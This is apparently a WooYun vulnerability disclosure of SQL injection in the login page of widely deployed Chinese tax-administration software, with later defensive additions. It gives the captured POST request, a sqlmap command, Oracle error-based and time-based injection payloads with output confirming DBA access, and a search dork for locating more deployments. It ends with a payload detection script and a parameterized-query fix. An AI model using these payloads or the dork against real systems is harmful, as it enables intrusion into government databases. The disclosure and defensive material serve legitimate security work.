Recording the best of hacking technique, spreading hacker culture, sharing the essence of hacking skills

SQL Injection Vulnerability in a Widely Used Tax Software

2014-10-08 22:46

The Statistical Reporting and Key Tax Source Management software is a report-management and data-analysis platform used across the State Administration of Taxation's business areas, including tax revenue planning, accounting and statistical reconciliation, key tax source management, and large-enterprise tax administration. The platform consists of the Tax Revenue Planning and Accounting Report System (TRS), the Key Tax Source Management System (TRAS), the Large Enterprise Tax Management System (VICDP), and the Tax Data Analysis System (WTAP).

-------------------------------------------------------------------------



Login form injection: throwing a single quote into the field is enough to make the application echo the SQL statement in an error...

http://www.snds.gov.cn:99/i/oem/grpslogin.jsp



[screenshot: aaaa.png]



[screenshot: aaa1.png]





Just feed the request to sqlmap; the vulnerable parameter is id:

./sqlmap.py -r test.txt -p id --is-dba

The captured login request saved as test.txt:

POST /i/oem/grpslogin.jsp HTTP/1.1
Host: www.snds.gov.cn:99
Proxy-Connection: keep-alive
Content-Length: 45
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.snds.gov.cn:99
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.snds.gov.cn:99/i/oem/grpslogin.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=2v2nT97LN6ylvDRB2bQTYXSJld6J5Tm2vvT6182H3Z1mG17N6cvF!-141727717

taskGroup=ZDSY&id=aaaa&opid=1&noleft=0&pw=aaa





Place: POST
Parameter: id
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: taskGroup=ZDSY&id=aaaa' AND 8581=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(113)||CHR(117)||CHR(113)||(SELECT (CASE WHEN (8581=8581) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(104)||CHR(102)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'GMad'='GMad&opid=1&noleft=0&pw=aaa

    Type: AND/OR time-based blind
    Title: Oracle OR time-based blind
    Payload: taskGroup=ZDSY&id=-9365' OR 5766=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(78)||CHR(109)||CHR(85),5) AND 'VquD'='VquD&opid=1&noleft=0&pw=aaa
---
[11:33:18] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[11:33:18] [INFO] testing if current user is DBA
[11:33:22] [WARNING] reflective value(s) found and filtering out
current user is DBA: True

Proof of vulnerability:

This is a GOV site, so I won't go guessing table names.

---
[11:42:58] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[11:42:58] [INFO] fetching current database
[11:42:58] [INFO] resumed: IRPT
[11:42:58] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'IRPT'
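The two sqlmap techniques reported above leave distinctive Oracle constructs in the POST body: XMLType() for the error-based channel, DBMS_PIPE.RECEIVE_MESSAGE for the time-based one, and long CHR()||CHR() chains in both. The script below is an added example, not part of the original report or of the tax-software product; it inspects captured login bodies for those markers so a WAF rule or log review can catch this kind of probing. The signature patterns, field list and the benign sample logins are constructed for the example; the two malicious bodies are the payloads quoted in the sqlmap output above.

```python
import re
from urllib.parse import parse_qs

# Markers of the two Oracle injection techniques sqlmap reported above
# (error-based via XMLType, time-based via DBMS_PIPE) plus the CHR()||CHR()
# string assembly both payloads use. Patterns are constructed for this example.
SIGNATURES = {
    "oracle_xmltype_error_based": re.compile(r"XMLType\s*\(", re.IGNORECASE),
    "oracle_dbms_pipe_time_based": re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE", re.IGNORECASE),
    "chr_concat_obfuscation": re.compile(r"(?:CHR\(\d+\)\|\|){3,}", re.IGNORECASE),
    "from_dual_subselect": re.compile(r"\bFROM\s+DUAL\b", re.IGNORECASE),
}

# The form fields of the grpslogin.jsp request shown in the report.
LOGIN_FIELDS = ("taskGroup", "id", "opid", "noleft", "pw")


def inspect_body(body: str) -> dict:
    """Map each suspicious login field to the list of signature names it matched.

    A lone single quote is reported too. On its own it is a weak signal (a name
    like O'Brien is legitimate), but it is exactly the probe that first exposed
    this application, so it is worth counting next to the stronger markers.
    """
    findings = {}
    params = parse_qs(body, keep_blank_values=True)
    for field in LOGIN_FIELDS:
        for value in params.get(field, []):
            hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
            if "'" in value:
                hits.append("single_quote")
            if hits:
                findings.setdefault(field, []).extend(hits)
    return findings


def scan(bodies) -> list:
    """Return (index, findings) for every POST body that matched at least one signature."""
    results = []
    for i, body in enumerate(bodies):
        findings = inspect_body(body)
        if findings:
            results.append((i, findings))
    return results


# Constructed sample: the benign login body from the report, a second benign
# login, and the two sqlmap payloads quoted above.
SAMPLE_BODIES = [
    "taskGroup=ZDSY&id=aaaa&opid=1&noleft=0&pw=aaa",
    "taskGroup=ZDSY&id=clerk07&opid=1&noleft=0&pw=example-pw",
    "taskGroup=ZDSY&id=aaaa' AND 8581=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(113)||CHR(117)||CHR(113)||(SELECT (CASE WHEN (8581=8581) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(104)||CHR(102)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'GMad'='GMad&opid=1&noleft=0&pw=aaa",
    "taskGroup=ZDSY&id=-9365' OR 5766=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(78)||CHR(109)||CHR(85),5) AND 'VquD'='VquD&opid=1&noleft=0&pw=aaa",
]


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_BODIES):
        print(f"body #{index}: {findings}")
```

The time-based payload matches only the DBMS_PIPE and CHR-chain signatures (it has no FROM DUAL subselect), while the error-based one trips all four; keying alerts on the Oracle-specific function names rather than on the quote alone keeps the false-positive rate manageable on a real login endpoint.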





A Google search turns up plenty more (it seems the whole country uses this one vendor):

inurl:/grpslogin.jsp







Fix:

Filter the input.
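"Filter" is the whole of the fix section; the durable correction is to stop assembling the login query from strings at all, so that a quote in the id field is data rather than SQL. The following is an added Python example, not code from the report or from the tax-software vendor: it places the vulnerable concatenation next to a parameterized query, with an in-memory SQLite table standing in for the Oracle IRPT schema behind grpslogin.jsp. The users table, its single row, and the function names are constructed for the example; password hashing is omitted to keep the focus on the query.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    # In-memory SQLite stands in for the Oracle schema (IRPT) behind the
    # report's login page; the table and its row are constructed for this example.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT PRIMARY KEY, pw TEXT, task_group TEXT)")
    conn.execute("INSERT INTO users VALUES ('zdsy01', 'example-pw', 'ZDSY')")
    conn.commit()
    return conn


def login_vulnerable(conn, user_id: str, pw: str, task_group: str) -> bool:
    # The form fields are spliced straight into the SQL text. A quote in `id`
    # changes the statement itself, and the database error that follows
    # carries the mangled query back to the caller, which is what the report
    # observed on grpslogin.jsp.
    sql = ("SELECT id FROM users WHERE id = '%s' AND pw = '%s' AND task_group = '%s'"
           % (user_id, pw, task_group))
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.OperationalError as exc:
        raise RuntimeError(f"database error: {exc}; statement was: {sql}") from exc


def login_parameterized(conn, user_id: str, pw: str, task_group: str) -> bool:
    # Hardened: the SQL text is constant and the values travel as bind
    # parameters (`?` here and in a JDBC PreparedStatement, :name in Oracle's
    # own syntax), so a quote in `id` is compared as data, never parsed as SQL.
    sql = "SELECT id FROM users WHERE id = ? AND pw = ? AND task_group = ?"
    return conn.execute(sql, (user_id, pw, task_group)).fetchone() is not None


def probe(login, conn, user_id: str, pw: str = "aaa", task_group: str = "ZDSY") -> str:
    """Classify what a login implementation does with one input:
    'match', 'no match', or 'error' (the tell-tale of the vulnerable path)."""
    try:
        return "match" if login(conn, user_id, pw, task_group) else "no match"
    except RuntimeError:
        return "error"


if __name__ == "__main__":
    conn = setup_db()
    # Valid credentials, a wrong user, and the report's stray-quote probe.
    for uid, pw in (("zdsy01", "example-pw"), ("aaaa", "aaa"), ("aaaa'", "aaa")):
        print(f"id={uid!r:9} vulnerable={probe(login_vulnerable, conn, uid, pw)!r:10} "
              f"parameterized={probe(login_parameterized, conn, uid, pw)!r}")
```

The vulnerable version answers the stray-quote probe with a database error that echoes the statement, exactly the behaviour the report's first screenshot shows; the parameterized version simply reports no matching user. Input filtering can sit in front of this as defence in depth, but it is the bind parameter that removes the injection.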

Source: www.wooyun.org/bugs/wooyun-2014-068010
